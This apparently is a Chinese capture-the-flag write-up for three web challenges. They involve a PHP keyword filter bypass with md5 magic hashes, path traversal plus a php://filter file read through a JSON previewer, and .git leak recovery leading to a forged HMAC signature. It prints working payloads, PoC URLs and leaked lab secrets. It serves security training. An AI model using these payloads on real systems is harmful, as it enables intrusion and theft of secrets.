web
消失的密钥
解
输入11测试下
[AUTH] 认证失败。意外的令牌格式。请阅读任务说明。
[系统日志] 输入已处理。
结果字符串:'11'
状态:已拒绝
提示:系统遇到了意外的序列。请重新验证您的凭证。令牌和凭证,很难不考虑下cookie,但实际啥也没有
题目说对key敏感,get和post参数key都没反应
直接输入key呢?
和传入11对比发现key被删掉了
双写绕过
?step1=kkeyey
[AUTH] 第一阶段成功。主常量:1337
[SYS] 错误:POST 数据结构"a"缺失。终端已锁定。
注意:该终端界面已弃用。需要手动注入。尝试POST a=11
回显 [SYS] 数据类型不匹配或常量错误。认证已终止。
然后不知道怎么做了,其实正确顺序应该先扫目录
/?source
php+HTML
<?php
// index.php
error_reporting(0);
include("flag.php");
if (isset($_GET['source'])) {
highlight_file(__FILE__);
exit();
}
$HIDDEN_KEY = "1337.php_is_funny";
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Internal Access Terminal</title>
<style>
body { background-color: #0a0c10; color: #c9d1d9; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; display: flex; justify-content: center; padding-top: 10vh; }
.terminal { width: 800px; background: #161b22; border: 1px solid #30363d; border-radius: 8px; padding: 0; overflow: hidden; box-shadow: 0 10px 30px rgba(0,0,0,0.5); }
.top-bar { background: #21262d; padding: 10px 15px; color: #8b949e; font-size: 12px; border-bottom: 1px solid #30363d; display: flex; justify-content: space-between; }
.content { padding: 30px; line-height: 1.6; }
.status-msg { margin: 15px 0; padding: 10px; border-radius: 4px; font-size: 14px; }
.status-err { background: rgba(248, 81, 73, 0.1); border-left: 4px solid #f85149; color: #f85149; }
.status-ok { background: rgba(63, 185, 80, 0.1); border-left: 4px solid #3fb950; color: #3fb950; }
.debug-log { background: #0d1117; border: 1px dashed #30363d; color: #8b949e; padding: 15px; font-family: 'Courier New', monospace; font-size: 13px; margin-top: 10px; }
.debug-accent { color: #58a6ff; }
.hint-text { color: #7d8590; font-size: 12px; font-style: italic; margin-top: 10px; display: block; }
input[type="text"] { background: #0d1117; border: 1px solid #30363d; color: #c9d1d9; padding: 8px; width: 250px; outline: none; }
input[type="submit"] { background: #21262d; border: 1px solid #30363d; color: #c9d1d9; padding: 8px 20px; cursor: pointer; border-radius: 4px; }
input[type="submit"]:hover { background: #30363d; }
code { color: #ffa657; background: rgba(255,166,87,0.1); padding: 2px 4px; }
</style>
</head>
<body>
<div class="terminal">
<div class="top-bar">
<span>ST_OS v4.2.1-RELEASE (AMD64)</span>
<span>AUTH_STATUS: UNAUTHORIZED</span>
</div>
<div class="content">
<h2>System Authentication</h2>
<?php
// --- LEVEL 1 ---
if (!isset($_GET['step1'])) {
echo "<p>Please enter authorization key:</p>";
echo "<form method='GET'><input type='text' name='step1'><input type='submit' value='Login'></form>";
} else {
$step1 = $_GET['step1'];
$filtered = str_replace("key", "", $step1);
if ($filtered === "key") {
echo "<div class='status-ok'>[AUTH] Phase 1 Success. Master Const: 1337</div>";
$a = $_POST['a'] ?? null;
if (!$a) {
echo "<div class='status-err'>[SYS] Error: POST data structure 'a' missing. Terminal locked.</div>";
echo "<p class='hint'>Note: The terminal UI is deprecated. Manual injection required.</p>";
} else {
$obj_a = (object)$a;
$user_key = $obj_a->key;
if (isset($user_key) && $user_key === "1337") {
echo "<div class='status-ok'>[AUTH] Phase 2 Identity Confirmed. Hash protocol initiated.</div>";
echo "<hr>";
$val_a = $_GET['a'] ?? "";
$val_b = $_GET['b'] ?? "";
if ($val_a !== "" && $val_b !== "" && $val_a !== $val_b) {
if (md5($val_a) == md5($val_b)) {
echo "<div class='status-ok' style='border: 2px dashed #3fb950;'>";
echo "CREDENTIAL_FOUND: <code>{$flag}</code>";
echo "</div>";
} else {
echo "<div class='status-err'>[SYS] Hash collision check failed.</div>";
}
} else {
echo "<div class='status-err'>[SYS] Collision check pending. Collision pending. (Params 'a', 'b' required via GET. )</div>";
}
} else {
echo "<div class='status-err'>[SYS] Data type mismatch or incorrect constant. Authentication terminated.</div>";
}
}
} else {
echo "<div class='status-err'>[AUTH] Authentication failed. Unexpected token format.Please read the task description</div>";
echo "<div class='debug-log'>";
echo "<span class='debug-accent'>[SYSTEM LOG]</span> Input processed.<br>";
echo "Resultant String: '<span style='color: #fff;'>" . htmlspecialchars($filtered) . "</span>'<br>";
echo "Status: REJECTED";
echo "</div>";
echo "<span class='hint-text'>Hint: The system encountered an unexpected sequence. Please re-verify your credentials.</span>";
echo "<br><form method='GET'><input type='text' name='step1' placeholder='Retry...'><input type='submit' value='Login'></form>";
}
}
?>
</div>
</div>
</body>
</html>其中
php
$obj_a = (object)$a;
$user_key = $obj_a->key;
if (isset($user_key) && $user_key === "1337")需要POST a[key]=1337
还有md5碰撞
240610708
QNKCDZOPoc:
http://39.105.213.28:12601/?step1=kkeyey&a=240610708&b=QNKCDZO
POST a[key]=1337
JSON Beautifier
解
提供了两种输入方式,json和uri
随便传点东西上去看看逻辑吧
回显
{
"success": true,
"preview_id": "preview_6cad920cb2359af0",
"preview_file": "preview_6cad920cb2359af0.tmp"
}直接/preview_6cad920cb2359af0.tmp
回显404,提示:网站通常会通过 /robots.txt 告诉爬虫哪些地方"不该去"
访问/robots.txt
User-agent: *
Disallow: /api/
Disallow: /api/preview.php
Disallow: /api/beautify.php
# nothing to see here :)/api/preview.php
JSON Preview API
Usage:
GET /api/preview.php?file=<name>
有些东西离这里有点远,也许换个路径层级再看看,会遇到更有意思的文件。/api/beautify.php
{
"service": "JSON Beautifier",
"usage": "POST JSON: {\"data\":\"...\",\"preview_type\":\"raw|data_uri\"}",
"preview_api": "/api/preview.php?file=<preview_id>.tmp"
}访问/api/preview.php?file=preview_6cad920cb2359af0.tmp
确实回显了输入的内容
尝试json注入探测一下会不会被解析
失败
换个思路,既然有?file=.... 那一定得尝试下任意文件读取了
常见的绝对路径都无法读取,回显not found
抓个包看看
存在一个响应头
有一个名为X-DocRoot的http头,问下ds
所以网页根目录很有可能是在/var/www/html/src
尝试文件读取/var/www/html/src/api/preview.php
还是not found
这里应该路径穿越
../../var/www/html/src/api/preview.php
原因是啥你别管,gpt给我说的
?file=../../var/www/html/src/api/preview.php
php
<?php
declare(strict_types=1);
header('Content-Type: text/plain; charset=utf-8');
header('X-Powered-By: JSON Preview');
error_reporting(0);
require_once __DIR__ . '/config.php';
function out(int $code, string $body): void {
http_response_code($code);
echo $body;
exit;
}
function startsWith(string $s, string $prefix): bool {
return strncmp($s, $prefix, strlen($prefix)) === 0;
}
function schemeOf(string $uri): ?string {
$p = strpos($uri, '://');
if ($p === false) return null;
$scheme = substr($uri, 0, $p);
if (preg_match('/^[a-zA-Z][a-zA-Z0-9+\.\-]*$/', $scheme) !== 1) {
return null;
}
return strtolower($scheme);
}
if ($_SERVER['REQUEST_METHOD'] !== 'GET') {
out(405, "Method Not Allowed\n");
}
if (!isset($_GET['file']) || trim((string)$_GET['file']) === '') {
out(200,
"JSON Preview API\n\n" .
"Usage:\n" .
" GET /api/preview.php?file=<name>\n\n" .
"有些东西离这里有点远,也许换个路径层级再看看,会遇到更有意思的文件。\n"
);
}
$file = (string)$_GET['file'];
$file = str_replace("\0", '', $file);
$requested = TMP_DIR . '/' . $file;
if (strpos($requested, TMP_DIR) !== 0) {
out(400, "Bad path\n");
}
$real = realpath($requested);
if ($real === false || !is_file($real)) {
out(404, "Not Found\n");
}
$tmpPrefix = rtrim(TMP_DIR, '/') . '/';
$srcPrefix = rtrim(SRC_API_DIR, '/') . '/';
if (!startsWith($real, $tmpPrefix) && !startsWith($real, $srcPrefix)) {
out(403, "Forbidden\n");
}
$content = file_get_contents($real);
if ($content === false) {
out(500, "Read error\n");
}
$isTmp = startsWith($real, $tmpPrefix) && preg_match('/\.tmp$/', $real) === 1;
$line = trim((string)$content);
if ($isTmp) {
$scheme = schemeOf($line);
if ($scheme !== null) {
$deny = [
'http', 'https', 'ftp', 'ftps',
'phar', 'expect',
];
if (in_array($scheme, $deny, true)) {
out(403, "Forbidden scheme\n");
}
$pos = stripos($line, 'resource=');
if ($pos === false) {
out(400, "Bad reference\n");
}
$resource = rawurldecode(substr($line, $pos + 9));
if ($resource !== FLAG_PATH) {
out(403, "Forbidden resource\n");
}
$data = @file_get_contents($line);
if ($data === false) {
out(500, "Resource read error\n");
}
echo $data;
exit;
}
}
echo $content;?file=../../var/www/html/src/api/config.php
php
<?php
declare(strict_types=1);
const APACHE_DEFAULT_DOCROOT = '/var/www/html';
const APACHE_DOCROOT = '/var/www/html/src';
const TMP_DIR = '/tmp/json_preview';
const SRC_API_DIR = APACHE_DOCROOT . '/api';
const FLAG_PATH = '/secret/flag';- 关键的是:如果你读的是一个 .tmp 文件,并且这个文件内容像一个 URI,它会额外走一段"二次读取"逻辑
- 这段逻辑会拦 http/https/phar/expect,但没拦 php://filter
- 它还要求 URI 里的 resource= 必须等于 /secret/flag
所以最后利用非常短:
1. 用 beautify.php 的 data_uri 模式,往 /tmp/json_preview/ 写一个临时文件
内容不是普通文本,而是:php://filter/convert.base64-encode/resource=/secret/flag
2. 再用 preview.php?file=<那个临时文件> 去读它
3. preview.php 看到这是 .tmp,且内容是 URI,就会执行 file_get_contents($line)
4. 因为 resource=/secret/flag 正好满足白名单,于是把 flag 读出来Poc
写入uri
data:text/plain;base64,cGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vc2VjcmV0L2ZsYWc=preview.php读取后解码
夜班审计台
知识点补充
1. /.git/refs/heads/master
-
含义 :存储
master分支(或main分支)当前指向的最新提交对象(commit)的 40 位 SHA-1 哈希值 -
示例内容:
d4f3a7b8e2c1f6a9b4c3d2e1f0a7b6c5d4e3f2a1
-
作用:这个哈希值代表该分支最新的一次 commit,Git 通过这个哈希值找到对应的提交对象及其完整代码快照
2. /.git/HEAD
-
含义 :指向当前检出的分支或提交(即你正在工作的位置)
-
示例内容:
text
ref: refs/heads/master
作用:告诉 Git 当前工作目录对应哪个引用(通常是分支名)
题目
某存储团队夜里临时挂出了一套"审计查询页",看起来像能查东西,实际上只会一本正经地回你几句模板话。白天值班的人说一切正常,真正不安分的细节,往往藏在他们以为没人会翻的地方。
解
先看眼源码,有一句
<script src="/static/main.js"></script>跟过去看看/static/main.js
document.addEventListener("DOMContentLoaded", () => {
window.__buildTrace = "/.git/HEAD";
});访问/.git/HEAD,下载文件
ref: refs/heads/master访问/.git/refs/heads/master,下载文件
9fdf9b412e7cfe179e59d28f25f47cffd68484e7既然有.git泄露就去拉一下备份
(注意这里不能用baiying的githack,因为它基本依赖 /.git/index,而本题的/.git/index是404,也不能用WangYihang的GitHacker,会把靶机搞炸,难绷。可以用Git_Extract,下载链接:https://github.com/gakki429/Git_Extract,注意是python2)
power
python 1.py http://39.105.213.28:49106/.git/
legacy_probe_stub.py
py
# legacy_probe_stub.py
# old night-shift fallback verifier kept for rollback testing
SERVER_SECRET = "ISCC_SERVER_SECRET_REAL"
LOCAL_ONLY = ("127.0.0.1", "::1")
AUDIT_NODE = "core-storage-01"
TIME_WINDOW = 60
def verify_probe(node_id: str, ts: int, sign: str) -> bool:
"""
internal/audit fallback:
msg = f"{node_id}:{ts}"
expected = HMAC_SHA256_hex(SERVER_SECRET, msg)
abs(now-ts) <= 60
remote_addr in LOCAL_ONLY
"""
raise NotImplementedError
class PixelRunner:
def __init__(self):
self.energy = 3
self.score = 0
def tick(self, move: str):
if move in {"left", "right", "jump"}:
self.score += 1
self.energy = max(0, self.energy - 1)
return self.score, self.energy
def demo_loop(script):
game = PixelRunner()
for move in script:
game.tick(move)
return game.scorelegacy_probe_stub.py.55cf35
py
# legacy_probe_stub.py
# compact handover note for the audit platform cut-over
DEFAULT_AUDITOR = ("auditor", "audit2025")
INTERNAL_DEV_SECRET = "ISCC_2026_JWT_DEBUG_KEY_#9527"
JWT_ACCEPTED = ["RS256", "HS256"]
def decode_ticket(token):
"""
current branch:
if header.alg == "RS256": verify with audit_rsa_pub.pem
elif header.alg == "HS256": verify with INTERNAL_DEV_SECRET
normal login still issues role=user
"""
raise NotImplementedError
def handover():
note = []
note.append("dashboard link to /auditor/nodes stays role-gated")
note.append("legacy fallback verifier was removed from this revision")
note.append("if night shift asks for old sign rule, inspect previous revision")
return note
class TinyMaze:
MAP = [
"#########",
"#..#....#",
"#..#.#..#",
"#....#..#",
"#########",
]
def __init__(self, start=(1, 1)):
self.pos = list(start)
def move(self, dx, dy):
x = self.pos[0] + dx
y = self.pos[1] + dy
if self.MAP[y][x] != "#":
self.pos = [x, y]
return tuple(self.pos)使用auditor/audit2025登录
拿到jwt
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhdWRpdG9yIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3NzgwNTczMDAsImV4cCI6MTc3ODA1OTEwMCwiaXNzIjoiXHU1OTFjXHU3M2VkXHU1YmExXHU4YmExXHU1M2YwIn0.b9NTcIfPXe5dqna8oewpxYsClLlMJ-L8fVzB5ynMdrkBSYprWrtttkEjOlAYepGdPVvSBJZS4_-wjoqqBKvfqQ69LyzvsnyWwN5qPmb9jsdVJsXiywCC3iP3X557V8RdN_T6n8h4Uk5MvvMxlBDLudtVfn3xuAjWyJxVsyn5JBINhQJJnpAL__5iIn1PPk8NfvlMh3jFg9PZ0V1qNaBEzPtAvB-1EX3-aimSjaL5QaBBj4zXaSHEUJeGPnTUb692SIcXJqO7u9-JqMSKsmL2Gh0iBK3PZw_An2q5ZPEa3_g6jclmsycOFLu9IGkAf6hFRZO_E5GtIi4ncOfyVwBc-w伪造jwt
这时回头看上一版提交,发现旧代码里直接写了签名逻辑:
py
SERVER_SECRET = "ISCC_SERVER_SECRET_REAL"
LOCAL_ONLY = ("127.0.0.1", "::1")
AUDIT_NODE = "core-storage-01"
TIME_WINDOW = 60
def verify_probe(node_id: str, ts: int, sign: str) -> bool:
"""
internal/audit fallback:
msg = f"{node_id}:{ts}"
expected = HMAC_SHA256_hex(SERVER_SECRET, msg)
abs(now-ts) <= 60
remote_addr in LOCAL_ONLY
"""
raise NotImplementedError这里几乎把内部接口认证规则全送了:
- 密钥:ISCC_SERVER_SECRET_REAL
- 节点名:core-storage-01
- 签名:HMAC_SHA256(secret, f"{node_id}:{ts}")
py
import hmac, hashlib, time
node_id = "core-storage-01"
ts = str(int(time.time()))
sign = hmac.new(
b"ISCC_SERVER_SECRET_REAL",
f"{node_id}:{ts}".encode(),
hashlib.sha256
).hexdigest()
print(node_id, ts, sign)拿去提交,拿到flag